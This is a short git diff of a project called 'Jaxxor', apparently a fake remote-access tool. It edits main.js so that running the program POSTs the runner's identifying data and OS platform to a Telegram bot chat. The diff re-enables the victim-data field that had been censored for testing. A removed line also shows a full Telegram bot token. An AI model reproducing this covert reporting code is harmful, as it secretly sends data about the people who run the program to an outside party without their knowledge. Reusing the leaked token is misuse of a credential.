diff --git a/Jaxxor/bin/Jaxxor.exe b/Jaxxor/bin/Jaxxor.exe
index cc83c36..bd200f3 100644
Binary files a/Jaxxor/bin/Jaxxor.exe and b/Jaxxor/bin/Jaxxor.exe differ
diff --git a/Jaxxor/src/main.js b/Jaxxor/src/main.js
index 4ae970a..2ea022c 100644
--- a/Jaxxor/src/main.js
+++ b/Jaxxor/src/main.js
@@ -53,11 +53,11 @@ axios({
}).then(d => {
logger.log("Successfully loaded the API. Loading modules...")
axios({
- url: "https://api.telegram.org/bot1143731138:AAF6hwgo1R6a4GbB_zmr0kNA2Ca86oFJ6sg/sendMessage",
+ url: "https://api.telegram.org/bot(censored)/sendMessage",
method: "POST",
data: {
chat_id: "@lmaotxt",
- text: `${/*d.data*/"(censored because testing)"} ran the fake rat. OS: ${require("os").platform()}`,
+ text: `${d.data} ran the fake rat. OS: ${require("os").platform()}`,
parse_mode: "HTML"
}
}).then(async () => {